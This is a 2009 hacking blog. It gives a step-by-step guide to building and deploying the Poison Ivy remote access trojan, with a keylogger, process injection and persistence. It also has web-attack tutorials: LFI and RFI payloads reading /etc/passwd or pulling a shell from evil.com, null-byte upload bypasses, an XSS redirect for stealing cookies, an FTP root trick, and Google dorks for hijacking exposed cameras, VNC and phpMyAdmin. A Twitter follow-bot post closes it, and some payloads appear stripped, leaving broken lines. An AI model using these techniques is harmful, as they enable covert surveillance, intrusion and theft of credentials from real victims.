Poison Ivy

Saturday, November 14, 2009


Dns Set Up]--

+ Go to

http://www.no-ip.com/

+ Sign up and download there software and install it (ip updater)
+ No-ip Ip Updater download ->
http://download.cnet.com/No-IP-DUC-Dynamic-DNS-Update-Client/3000-10248_4-10055182.html?tag=lst-1&cdlPid=10375673

+ Sign in on the the website and click Add a Host
+ Now this is where you will create your dns, choose a name of your liking and choose from the drop down list
+ Click Create Host
+ Sign in with the your no-ip details on the Ip updater software and you should see your host you created just before.. now your done setting up your host.



 --[Downloading]--

Download all of the following

+ Poison Ivy 3.2 ->
http://www.poisonivy-rat.com/index.php?link=download
 
+Patch poison ivy 2.3
http://www.4shared.com/file/110443811/139faf9a/poisionivy232-patch.html


 --[Installing]--

+ Extract PI2.3.2.rar and poision.ivy.2.3.2-patch.rar

+ Copy poision.ivy.2.3.2-patch.exe to PI2.3.2






 
+ Run poision.ivy.2.3.2-patch.exe and click patch
 


 + --[Client and Server Set Up]--

Setting up the Client
+ Run Poison Ivy 2.3.2.exe.. go to File>New Client
+ This is where you decide the port you will use for the customer to connect through.. use something your other apps wont be using.

 

+ Once you have decided on your port your going to have to forward that port on your router/modem, im not going to go into alot of detail on how to forward ports..
+ First set up a static ip, you can find out how to do that here ->
http://www.portforward.com/networking/staticip.htm
 
+ Second go to(below) and find router/modem
http://www.portforward.com/
 
+ Third select any app/game that shows up in the list and follow the directions but replace the port they give you with the one your using for Poison Ivy.
  
Setting up the Server
+ Go to File>New Server
+ Click Create Profile and select a profile name..
+ Enter you dns and port number then click add
+ Keep admin as pass or change (if you change the pass you have to have the same pass on the client or you wont get connections being accepted)



+ Choose a HKLM/Run Name and click the Random button a few times to generate a ActiveX Key Name
+ Then click Next



 + Create your own Mutex or leave as is.
+ Tick the next 3 boxes and select and type in a process to inject into to or leave as is
+ Tick keylogger box if thats what ya want.....
+ Click Next to proceed+
 

+ Here you have the option to choose a icon
+ Ticking Execute Third-Party Application after build (upx.exe) will decrease your server size when built
+ Click Generate and type in the name of your server and click save.

--[Having Connections Problems?]--
+ If you find that your no longer getting any connections then
1, Check to see if the No-IP Ip Updater has updated your current ip (you will need to update your dns everytime you restart your router/modem IF you have a dynamic IP.
2, Are you on a VPN?? If yes check to see if your VPN allows traffic through your port there are alot that don't.
3, If you have alot of connections that are in lets say minisota or USA in general then you should consider that alot of people turn off there computers at night when they go to sleep.





 

Server Flaws

Friday, November 13, 2009

Today I will be showing you many, many, flaws on an internal server, we will go through PHP Attacks, Java attacks, and URL manipulation.

Lets start with URL manipulation, shall we?

URL Manipulation

Well, lets say you find a login for a certain website.
Go ahead and view the source.
If you see anything familiar to:

index.php?file=login.php

Then that is the PHP file representing login.php, here is an example of how the URL may look like:

http://www.target.com/admin/index.php?file=login.php

Once we go there it will probably forbid access because we did not enter anything and we do not have any SESSION id given by the server.

But don't you see anything suspicious on the page that is functioning (index.php?file=login.php) Well, if you see anything cached on that page such as: password.php, your in luck. Go to that exact PHP file. You can do this via: http://www.target.com/admin/index.php?file=password.php
And you might get back the Administrator Username and Password, and it has no encryption in any format whatsoever (MD5, SHA1, etc)

But the Administrators can go further to protect them selves, but there are more manipulations. Lets continue on to them?

Null Byte Includes

Now, on our last URL manipulation, we got access to the admin site, and while reviewing the source we found:

index.php?file=login.php

Which featured us the password.php motive which told us that if we replaced login.php with password.php it will feature the administrative USR and PWD without any encryption (md5, sha1, etc).

But, what if the administrators have knowledge and are smarter, but what they think is that LFI, is LFI, and if its original form doesn't work, it would never work. But that is totally wrong. You can use Null Byte includes to gain knowledge in the PHP/CGI source that is representing that file.

So basically lets say that password.php was forbidden for outside users, here is a sample of that content:

index.php?file=password.php

It featured content showing the password without any encryption.
But once you go to it, your forbidden, but this can be changed by adding a Null Byte include. Here is how it would look:

index.php?file=password.php

That poisoned null byte gives us the ability to view the source of that .PHP file thus giving us the password for the administrative user account.

This can be used for other destruction such as viewing config.php, /etc/passwd, etc.

Null Byte Upload

Lets say you make an attempt to upload a shell on some website, but it replies back with an error claiming it only accepts JPG, PNG, etc.

Well most of you would say "Ugh ill just give up"
And others would say "I will just rename my shell to ShellName.php.jpg"

Both are wrong.

You can simply bypass this using a poison null byte upload.
How do you do this destructive attack? Its really simple, follow this steps to determine your question:

1. Open Notepad
2. Copy and Paste your PHP Shell
3. File >> Save as >> shellname.php.jpg
4. Upload to the server

Our null byte () adds a URL -Encoded format into .jpg thus giving back our file (in most cases your shell).

LFI Tutorial

LFI Represents Local File Inclusion, it is basically a URL transverse, here is an example of an LFI code:

victim.com/index.php?page=../../../../../../../etc/passwd

And here is an example of a vulnerable code:

$page = $_GET[page];
include($page);
?>

That PHP script should never be used, because $page is passed directly on the webpage.

And the LFI code represents what can happen if your $page is written like that.

the ../'s you see are called URL transversal, they let you serve anywhere around the server using characters that represent UP, Down, etc.

Lets move on to the LFI script itself and play around with it for a bit.

victim.com/index.php?page=../../../../../../../etc/passwd

What that does is goes up to the directory /etc/passwd.
/etc/passwd is a representation for a Linux box featuring its encrypted password, just like Windows has its own encrypted passwd function (SAM) Unix has it as well.

Once they gain access to that directory, they have the ability to view users, and crack the encoded password via Brute-Force.

But sometimes Administrators can be smart, and this is where the poisoned null byte comes in hand, if you cannot access /etc/passwd, it eventually means that the Administrator progressed something into it.
So you can try:

victim.com/index.php?page=../../../../../../../etc/passwd

You can use a poison null byte due to the fact that sometimes Admins try to add something like .php.txt etc to make it harder for you to gain access to the file.
Fortunately you can easily bypass this using the poison null-byte.

RFI Tutorial

RFI is most commonly used to transmit a shell to a web server but its actually not uploaded, it is just an appearance on the web server itself.

RFI can be used for plenty of things, transmitting password loggers, etc. But its commonly used for its brilliant ability to store a shell.

Now if your not familiar with what a shell is, a shell is a PHP script that is used to cd to directories, view dirs, gain access to mysql, and find private files the server has stored on there web server.

How can this be a bad thing for you? They can leak an entire db leak using there access in MySQL, this db can feature usernames, passwords, emails, etc.

They can gain access to ANYTHING. Here is an example of an RFI attempt:

http://www.victim.com/index.php?page=htt...shell.txt?

That tells the web server to go to the page of http://www.evil.com/shell.txt
and how will it work you may be asking yourself, well it will work because the .txt file is filled with PHP commands/tags that point at the PHP extension.

We need to add the ? due to the fact that its basically like a URL transversal thing but its really not it just points at that directory (http://www.evil.com/shell.txt).

XSS

XSS is used a lot on search engines, it can also be used to point at an xsshell.

But first, lets play around with Javascript. Find yourself a search-box, and try typing this in:



That makes an alert textbox featuring our keyword "Test".
So press enter, and if it comes back with what we presented in our script, then your site is vulnerable to XSS

You may be saying, is this only possible in Javascript? No, there are HTML Injections, which look familiar to this:


sup



If you get the (sup) back, it is also vulnerable to HTML injection.

But we are focusing on Javascript. Lets say we wanted to point a bitch at our xsshell we created which logs cookies. We can do this using this simple javascript script:

<(meta) content="0;url=http://www.yourxsshell.com/attack.php" http-equiv="refresh">

That uses meta to redirect to your xsshell.

Here is an example of how that may look after its encoded (this uses google.com as an example)

http://www.lapdonline.org/search_results...rch_terms=

There you go, it is encoded.

What you want to is redirect it to your XSSHell, so you might need to modify my example.

Download xsshell (includes info etc)

http://www.darknet.org.uk/2006/12/xss-sh...door-tool/

Now once you send that XSS'd link to somebody which includes your xsshell you will log all of their cookies, ses id's, etc.

You can even put a Trojan download instead of an XSShell, but you have to make it look well-thought out.

FTP Hacking

FTP is the File Transfer Protocol on a web server, it is used to store files, view files, etc.

But there is a root account that contains all the permission, we don't have root and it would probably take forever to do a Brute-Force on the account.

So a trick is to do the following:

1. Open Command Prompt
2. Type in: ftp http://www.target.com
3. Enter WRONG details.
4. Then once your done with that type in: quote user ftp
then type in quote cwd ~root
then type in quote pass ftp

That quotes the user account FTP
Then it quotes the cwd of ~root

Don't expect this to work on every website, some websites have anonymous login disabled meaning this won't work as much as you expected it to .


Part 2

Robots.txt destruction:

Robots.txt is a text file that is used to control spiders that visit your website. This file grants access to certain folders, file types, and specific files depending on the robot accessing the site.

Here is an example of Robots.txt:

User-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Disallow: /nwshp
Disallow: /?
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /sorry/
Disallow: /imgres
Disallow: /keyword/
Disallow: /u/

Also, theUser-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Disallow: /nwshp
Disallow: /?
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /sorry/
Disallow: /imgres
Disallow: /keyword/
Disallow: /u/
Disalow: /admin/

This can be used as a URL transversal method.

Here is an example of how it may look like:

http://www.host.com/disallowed directory/RandomLeters&symbols

Well, after you get a 404 ERROR page, you should see something like /../
You may notice that from our LFI explanation, /../ is used to transmit to other directories, well in this case giving us access to the disallowed directories that are formed in Robots.txt. For example

http://www.host.com/disallowed directory/Abunchofrandomletters&symbols/../admin/

But do NOT expect this to work on every single website that has Robots.txt

PPPoE Exposure

A method of transmitting PPP traffic over Ethernet to the Internet through a common broadband medium.

But sometimes even hosts do not have PPP tunneled (if they have it on there network).

PPP can used in telnet, so that is what we will we be focusing on.

First, you want to do an nmap scan via:

nmap -v -A host.com

And you will need to wait until it is finished, we will need to see what OS this runs under, this will give us loads of information such as possible router info.

So after its done you might want to go to google and search:

Router-Name Default Password

Because in telnet, the PPPoE password is usually defaulted.

So for example, if it prompts you for the user and password, you can try:

Admin
Password

Now, once your in. You can cd to directories and view dirs, the /var section includes ability to view messages, logs, etc.
You may want to focus on finding config.xml, because that included CWMP, ACS, and possible POP information.

If however you cannot get PPPoE access, you can run a Brute-Force attack, or you can try accessing certain directories such as cwmp.host.com, usually the sites are put under https because they think its a high-level of encryption so its harder to crack, but the password for that can be easily prompted by using useragent vulnerables, cookie spoofing, and also FTP vulnerabilities which were discussed in our previous tutorial on Web Hacking.

The FTP Vulnerabilities we discussed will get you on a very high level because it may include db's, configs, etc.

Serverside Includes (Evil SSI)

The most common way to to find one of these vulnerabilities are to simply use a search box. Serverside Includes are basically abilities to view directories.. Just so I can explain it in a more efficient way, lets say your in the directory /admin, and you have a search field, and your wondering what else is in the /admin directory, well you can simply use this :



ls is a command used to display directories, and cmd is basically a Command Prompt.

After we get a reply displayed along with directories, we can use rm to remove directories, example:



We can do a lot of things, but these are just set examples.

Hack Using Google

1. Hack Video cameras
Type this in google inurl:viewerframe?mode= or this inurl:"viewerframe?mode=refresh" with quotes and click any result...
you can see cameras around the world..and you can move some cameras....


2. Search Google for free files
Type this into google with the quotes "intitle:index of" anything and you
can download free files like music movies games and so on for example i used this one but u can write whatever u want for ex. "intitle:index of" hacks GO AN TRY:....
i found this one RAPIDSHARE :P haven't tried it but it looks really good http://www.rapidshare1.com/rapidshare.com/ or this one http://www.leetupload.com/dbindex2/index...20Packers/



3. Get Usage statistics for sites
Get traffic statistic for sites .... put this with the quotes into google intitle:"usage statistics for" "generated by webalizer" and choose the site...


4. Search for "ROBOTS"

  Okay i just don't know is this useful but its not for me..but anyway ill post it...Type this into google with the quotes "robots.txt" "disallow:" filetype:txt


5. Search for FTP`s

Search for FTPs.... type this into google intitle:index of ws_ftp.ini and choose..:P


6. Get Front Page sites user name and password

This one is good ...but the bad thing is that you must decrypt password
...Its a DES Encryption so try using John the ripper...
U must have front page installed on ur PC so u can DEFACE the page
Type this in google with quotes and click any page inurl:_vti_pvt "service.pwd"

7. Remote another Computer

  Okay this one is nice...you can take over someones pc but the problem is that u don't know the password...
so u will need to use bruteforcer.... the best for this is any VNC Bruteforcer
Type this in google with quotes "vnc desktop" inurl:5800 If u don't have much results change the number to 5801..than 5802 and so...

8. Get Full access to phpMyAdmin


  This one is cool...U can get full control of someones MYphpAdmin ....type this into google intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" and click any....

How to get tons of followers on Twitter

Wednesday, November 11, 2009

First, (you may want to make a new Twitter account if you're paranoid of offline phishers.) Download here
http://autotwitterbot.com/download.php

Open it up and click "Manage Accounts" and then "add."
Type in your user/pass and hit add.
Highlight your account and click "Login"
Now, it should redirect you a few times; but you should end up at the Twitter home page.

Go to this site and pick on of the names on the list.
http://www.pickmore.com/internet/highest-number-of-twitter-followers-2118

Goto that persons page on Twitter in ATB.

Click on the right hand side where it lists the number of followers.

Now you should be able to click the button at the top that says "Follow all"

Now just let it run overnight, and hopefully in the morning; you should have tons of followers who followed you back.

Now if you want you can goto your following page and click "Unfollow all" so that you aren't following 2 billion people.

###Warning#### I just foud out that Twitter might suspend your account if you do too many people in a short ammount of time. Try using the Limit Follow/Unfollow option